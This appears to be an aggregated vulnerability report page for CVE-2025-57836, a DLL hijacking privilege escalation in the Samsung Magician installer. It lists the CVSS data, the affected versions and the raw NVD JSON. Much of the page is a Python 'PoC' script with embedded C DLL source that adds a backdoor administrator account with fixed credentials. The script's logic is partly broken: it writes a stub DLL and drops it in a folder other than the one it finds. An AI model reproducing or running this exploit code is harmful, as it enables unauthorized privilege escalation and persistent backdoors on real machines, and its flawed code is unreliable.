Security Vulnerability Report
中文
CVE-2025-57836 CVSS 7.8 HIGH

CVE-2025-57836

Published: 2026-01-05 17:15:46
Last Modified: 2026-01-30 01:26:48
Source: [email protected]

Description

An issue was discovered in Samsung Magician 6.3.0 through 8.3.2 on Windows. The installer creates a temporary folder with weak permissions during installation, allowing a non-admin user to perform DLL hijacking and escalate privileges.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:samsung:magician:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Samsung Magician 6.3.0
Samsung Magician 6.4.0
Samsung Magician 7.0.0
Samsung Magician 7.1.0
Samsung Magician 8.0.0
Samsung Magician 8.1.0
Samsung Magician 8.2.0
Samsung Magician 8.3.0
Samsung Magician 8.3.1
Samsung Magician 8.3.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-57836 PoC - Samsung Magician DLL Hijacking Privilege Escalation # Target: Samsung Magician 6.3.0 - 8.3.2 # Attack Vector: Exploit weak temporary folder permissions during installation import os import sys import time import shutil import subprocess import ctypes from pathlib import Path def create_malicious_dll(): """Generate malicious DLL that creates admin user""" dll_code = ''' #include <windows.h> #include <stdlib.h> BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { if (fdwReason == DLL_PROCESS_ATTACH) { // Create new admin user: attacker/Attacker@123 system("net user attacker Attacker@123 /add"); system("net localgroup Administrators attacker /add"); // Alternatively, add to RDP users or create backdoor } return TRUE; } ''' # Note: In real attack, compile this to DLL # For demonstration, create placeholder dll_path = Path(os.environ['TEMP']) / 'SamsungTemp' / 'msvcr120.dll' dll_path.parent.mkdir(parents=True, exist_ok=True) with open(dll_path, 'wb') as f: f.write(b'MZ' + b'\x00' * 100) # Minimal DLL stub return str(dll_path) def find_weak_temp_folder(): """Identify Samsung Magician temporary folder with weak permissions""" temp_base = os.environ.get('TEMP', 'C:\\Windows\\Temp') search_patterns = ['Samsung', 'Magician', 'SAMSUNG', 'MAGICIAN'] for root, dirs, files in os.walk(temp_base): for d in dirs: for pattern in search_patterns: if pattern in d: folder_path = Path(root) / d # Check if low-privilege user can write try: test_file = folder_path / '.write_test' test_file.touch() test_file.unlink() return str(folder_path) except: continue return None def exploit(): """Main exploitation routine""" print("[*] CVE-2025-57836 Samsung Magician DLL Hijacking Exploit") print("[*] Searching for vulnerable temporary folder...") target_folder = find_weak_temp_folder() if not target_folder: print("[-] No vulnerable folder found. Ensure Magician installation is running.") return False print(f"[+] Found vulnerable folder: {target_folder}") print("[+] Dropping malicious DLL...") dll_path = create_malicious_dll() print(f"[+] Malicious DLL placed at: {dll_path}") print("[+] Waiting for process to load DLL...") # Wait for installation process to load the DLL time.sleep(30) # Verify privilege escalation result = subprocess.run('net user attacker', capture_output=True, text=True) if 'attacker' in result.stdout: print("[+] SUCCESS: Admin user 'attacker' created!") return True else: print("[-] Exploitation failed or pending") return False if __name__ == '__main__': if not ctypes.windll.shell32.IsUserAnAdmin(): print("[*] Running as low-privilege user - ready to exploit") exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-57836", "sourceIdentifier": "[email protected]", "published": "2026-01-05T17:15:45.877", "lastModified": "2026-01-30T01:26:48.190", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Magician 6.3.0 through 8.3.2 on Windows. The installer creates a temporary folder with weak permissions during installation, allowing a non-admin user to perform DLL hijacking and escalate privileges."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-427"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:samsung:magician:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3.0", "versionEndIncluding": "8.3.2", "matchCriteriaId": "F95B778A-7924-411F-B9D4-0921FC9ED4BE"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-57836/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.